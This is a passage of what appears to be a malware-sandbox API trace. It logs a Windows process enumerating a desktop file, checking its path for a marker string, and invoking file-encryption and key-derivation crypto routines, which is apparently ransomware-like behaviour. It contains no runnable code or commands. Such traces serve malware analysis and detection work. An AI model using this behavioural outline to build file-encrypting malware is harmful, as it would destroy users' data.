ftLastWriteTime.dwHighDateTime=0x1d5e3d5, nFileSizeHigh=0x0, nFileSizeLow=0x81f0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="CosD3IMWD.wav", cAlternateFileName="COSD3I~1.WAV")) returned 0x90add8 [0158.449] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.449] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0158.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CosD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="osD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sD3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3IMWD.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.451] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0158.451] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0158.451] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0158.451] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0158.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0158.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.452] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0158.452] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0158.452] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0158.452] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0158.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.453] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0158.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0158.453] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b58cd0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x64768a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x64768a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d5, nFileSizeHigh=0x0, nFileSizeLow=0x81f0, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="CosD3IMWD.wav", cAlternateFileName="COSD3I~1.WAV")) returned 0x90af58 [0158.453] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0158.453] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0158.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0158.453] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.454] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.454] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.454] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0158.454] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0158.454] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.454] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0158.454] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.455] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.455] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0158.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.455] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0158.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0158.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.459] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0158.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0158.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0158.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0158.460] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0158.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0158.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0158.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0158.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.461] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.462] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0158.462] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.462] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.462] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.462] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0158.462] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.462] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.462] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.462] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.462] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.462] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.463] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.463] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.463] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.463] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.463] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.463] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.463] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.463] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0158.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, 